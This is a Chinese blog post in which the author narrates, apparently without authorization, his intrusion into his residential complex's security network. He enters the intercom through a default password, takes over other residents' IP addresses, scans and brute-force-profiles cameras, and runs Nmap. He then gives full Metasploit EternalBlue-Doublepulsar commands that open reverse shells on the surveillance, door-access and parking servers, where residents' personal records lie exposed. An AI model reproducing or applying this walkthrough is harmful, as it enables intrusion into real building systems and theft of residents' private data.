我是如何一步一步搞定小區的安防系統
前言
博主從小就是一個喜歡把事情簡單化的男人,但是現實總是在不經意間給你太多的驚喜,比如不停的搬家。
博主從大學畢業到現在前前後後湊足了10次搬家運動,終於在第10次搬家的時候搬進了真正屬於自己的房子。
15年底趁著房價最低的時候撿了個漏,一咬牙買下一套兩房半小居室,17年交房裝修,終於在18年初計劃搬進去住,博主我終於再也不用搬家了,心情愉悅,住進去之後就開始忙乎各種瑣事,所以這幾個月是非常的繁忙,部落格也更得少,不過內容都在筆記裡面,慢慢更。
博主所購的小區對自己的智慧化系統宣傳的很到位,所以閒下來的時候博主我就對小區的安防系統進行一次簡單的滲透,輕鬆拿下各種安防系統,這篇文章就來詳細的說明一下。
準備
開始之前,博主需要對環境進行一個簡單的描述,以便大家能夠在腦海中腦補一下整個滲透測試的過程,算是博主線上下滲透的一個例子吧,往後還有對整個商場各種店鋪各種的滲透過程,都會一一講解。
好了,廢話就不多說了,咱們既然是對網路系統進行滲透測試,自然是得有一個入口,那這個入口在哪找呢?
大家都知道,一般小區這種內部的網路都是不直接連線到外網的,如果連那也是做了隔離,單獨有一個跳板來做轉發,這樣相對比較安全,但是正常情況都是沒外網的,這種區域網系統有兩個突出的特點。
第一點就是維護人員過分的信任了內網的機器,認為只要不連線外網就基本上沒事,高枕無憂,真是圖樣圖森破。
第二點就是沒有安全防護軟體,就算有,那也是病毒特徵庫千百年不會更新,跟擺設一樣,沒有外網更新個毛線,這一點後面有機器可以驗證。
所以具備這兩個特點的內部區域網是非常脆弱的,只要找到一個入口,基本上整個網路就game over了,這個入口就非常的好找了。
眾所周知,現在的小區都是家家戶戶安裝了一個可視對講機,這玩意有時候挺好用,比如有客人來了,樓下大門門禁可以用這玩意遠端開門,可以語音對講,可以看到對方的臉,還可以錄音錄影,不僅如此,還能跟家裡的煙霧報警器連起來,發生火災直接通知物業併發出警報,還可以呼叫其他住戶來一個免費的區域網語音聊天,功能可以說是相當豐富了。
你猜的沒錯,咱們整個滲透測試過程就從這個裝置開始,先來看看咱們這個厲害的可視對講機長什麼樣
通過預設弱口令進入工程模式,拿到ip地址,閘道器還有伺服器地址
拆下對講機
我擦嘞,這網線也太短了吧,上工具
把網線進行延長方便接交換機、路由器、筆記本之類的裝置,最後確認下通訊是否正確
基本準備工作搞定之後就開始進行入侵滲透了。
掃描
根據之前擼光貓內網的經驗,這裡的IP地址肯定是固定的,而且跟住戶號是繫結的,如果使用自己的iP地址進行測試,萬一出啥問題那不是非常的尷尬,既然現在很多業主都還沒有入住,那麼IP地址池也有很多的空閒,就使用其他住戶的IP地址吧,只要不衝突就行,說幹就幹,上裝備:
一個充電寶、一個路由器、一臺筆記本
通電後設置路由器的固定IP
這樣筆記本通過無線wifi就可以對IP段進行掃描了,我這使用的掃描軟體是Angry IP Scanner,圖形介面用起來很爽,而且速度也快
對192.165.0.1/16進行掃描發現存活主機1256個,為了對IP地址快速分類,將存活的IP地址全部匯出,編寫python指令碼對ip的http響應頭進行分類,最終分為下面的這幾類:
第一類
第二類
DNVRS-Webs
Hikvision-webs/
App-webs/這三種都是海康威視的監控探頭,登入介面有以下幾種
只有中間那種可以無限次輸錯密碼進行爆破,其他兩種都是輸錯五次就鎖定
第三類
Net Keybord-Webs這是一個網路鍵盤,通常用於操作監控的雲臺轉動,比如球機的操作杆,登入介面
密碼輸錯6次就鎖定。
第四類
通過對這幾種裝置的歸類掃描,最終確定了幾臺windows伺服器
192.165.15.174
192.165.15.177
192.165.15.190
192.165.15.200
192.165.30.2使用Nmap掃描結果如下
# Nmap 7.70 scan initiated Fri May 18 23:51:30 2018 as: nmap -iL something_ip.txt -oN scaned.txt -T4 --openNmap scan report for 192.165.15.174
Host is up (0.063s latency).
Not shown: 990 closed ports
PORT STATE SERVICE
135/tcp open msrpc
139/tcp open netbios-ssn
445/tcp open microsoft-ds
1433/tcp open ms-sql-s2383/tcp open ms-olap4
49152/tcp open unknown
49153/tcp open unknown
49154/tcp open unknown
49155/tcp open unknown
49156/tcp open unknown
Nmap scan report for 192.165.15.190
Host is up (0.046s latency).
Not shown: 992 closed ports
PORT STATE SERVICE
135/tcp open msrpc
139/tcp open netbios-ssn
445/tcp open microsoft-ds
49152/tcp open unknown
49153/tcp open unknown
49154/tcp open unknown
49155/tcp open unknown
49156/tcp open unknown
Nmap scan report for 192.165.15.200
Host is up (0.030s latency).
Not shown: 991 closed ports
PORT STATE SERVICE
135/tcp open msrpc
139/tcp open netbios-ssn
445/tcp open microsoft-ds
49152/tcp open unknown
49153/tcp open unknown
49154/tcp open unknown
49155/tcp open unknown
49156/tcp open unknown
49157/tcp open unknown
Nmap scan report for 192.165.30.2
Host is up (0.064s latency).
Not shown: 990 closed ports
PORT STATE SERVICE
135/tcp open msrpc
139/tcp open netbios-ssn
445/tcp open microsoft-ds
3389/tcp open ms-wbt-server
49152/tcp open unknown
49153/tcp open unknown
49154/tcp open unknown
49155/tcp open unknown
49156/tcp open unknown
49157/tcp open unknown# Nmap done at Fri May 18 23:51:46 2018 -- 5 IP addresses (4 hosts up) scanned in 16.25 seconds很明顯,四臺機器都開了445埠,其中 192.165.15.174 開了1433埠,明顯是sql server資料庫,192.165.30.2還開了3389,這臺機器是在門禁機裡面見過,是門禁系統的伺服器。
下面就重點對這幾臺機器入手,使用msf掃描下看是不是都存在smb漏洞(ms17_010),這漏洞在區域網真的超級好用,掃描截圖
發現只有192.165.15.174 不存在ms17_010,其他三臺都存在,作業系統分別是
192.165.15.190 win7 sp1 x86
192.165.15.200 win7 sp1 x64
192.165.30.2 win7 sp1 x86
現在目標就非常明確了,但是有個問題,msf自帶的利用模組只針對x64版本的作業系統,對於x86版本的系統只能使用其他工具,emmmmm....
一陣思考之後,博主決定先搞定那臺64位win7,為了能夠正常的反彈shell回來,我把路由器改成橋接模式,本機電腦設定固定IP,這樣我的機器就跟目標機器處於相同網路拓撲,反彈自然無壓力
so...
msf的用法我這裡就不多說了,如果真不知道,可以留言...給出一張run vnc的截圖,拿下監控系統
有趣的是這臺機器上居然安裝了360安全衛士...
注意看上面一張圖的那個監控室,管理員面前有三臺機器,所以另外兩臺我下一步就要搞定。
上面說64位win7已經拿下,現在搞定32位機器,使用 https://github.com/ElevenPaths/Eternalblue-Doublepulsar-Metasploit 這裡的Ruby指令碼即可,需要注意的是如果本機是kali 64位的需要安裝 wine32,安裝方法是
dpkg --add-architecture i386 && apt-get update && apt-get install wine32而且全程操作需要在root下面,安裝完wine32後執行一下 wine32 cmd.exe 這樣會自動在/root下面建立.wine目錄,這個目錄msf會用到
使用
git clone https://github.com/ElevenPaths/Eternalblue-Doublepulsar-Metasploit.git將指令碼克隆到本地,然後把目錄下的deps 目錄和rb檔案複製到msf的modules路徑下,這樣既可以使用了(PS:我這裡只複製了rb指令碼,deps沒有複製過去所以命令不太一樣),具體命令如下
msf > use exploit/windows/smb/eternalblue_doublepulsar
msf exploit(windows/smb/eternalblue_doublepulsar) > set ETERNALBLUEPATH /home/poweroff/Github/Eternalblue-Doublepulsar-Metasploit/deps/
ETERNALBLUEPATH => /home/poweroff/Github/Eternalblue-Doublepulsar-Metasploit/deps/
msf exploit(windows/smb/eternalblue_doublepulsar) > set DOUBLEPULSARPATH /home/poweroff/Github/Eternalblue-Doublepulsar-Metasploit/deps/
DOUBLEPULSARPATH => /home/poweroff/Github/Eternalblue-Doublepulsar-Metasploit/deps/
msf exploit(windows/smb/eternalblue_doublepulsar) > set TARGETARCHITECTURE x86
TARGETARCHITECTURE => x86
msf exploit(windows/smb/eternalblue_doublepulsar) > set PROCESSINJECT wlms.exe
PROCESSINJECT => wlms.exe
msf exploit(windows/smb/eternalblue_doublepulsar) > show targets
Exploit targets:
Id Name
-- ----
0 Windows XP (all services pack) (x86) (x64)
1 Windows Server 2003 SP0 (x86)
2 Windows Server 2003 SP1/SP2 (x86)
3 Windows Server 2003 (x64)
4 Windows Vista (x86)
5 Windows Vista (x64)
6 Windows Server 2008 (x86)
7 Windows Server 2008 R2 (x86) (x64)
8 Windows 7 (all services pack) (x86) (x64)
msf exploit(windows/smb/eternalblue_doublepulsar) > set target 8
target => 8
msf exploit(windows/smb/eternalblue_doublepulsar) > set rhostset rhost
msf exploit(windows/smb/eternalblue_doublepulsar) > set rhost 192.165.15.190
rhost => 192.165.15.190
msf exploit(windows/smb/eternalblue_doublepulsar) > set lhost 192.165.7.11
lhost => 192.165.7.11
msf exploit(windows/smb/eternalblue_doublepulsar) > exploit不出意外的話攻擊就成功了,給出攻擊成功的截圖。
第一個是門禁系統,沒裝防毒軟體,就只有一些門禁卡管理軟體
第二個系統是車輛管理系統,車輛出入庫時候用的
總結
好了,至此,博主對小區的安防系統進行了簡單的滲透測試,成功拿下關鍵系統,其中在伺服器中還發現了大量的敏感檔案,包括業主的個人資訊,車輛資訊,車輛出入登記資訊等等,難怪說各種騷擾電話,這簡直要分分鐘洩露。
後記
安全是一個整體,千里之堤潰於蟻穴,下一次把門禁卡的複製破解還有自動控制升降槓的綜合在一起再寫一篇。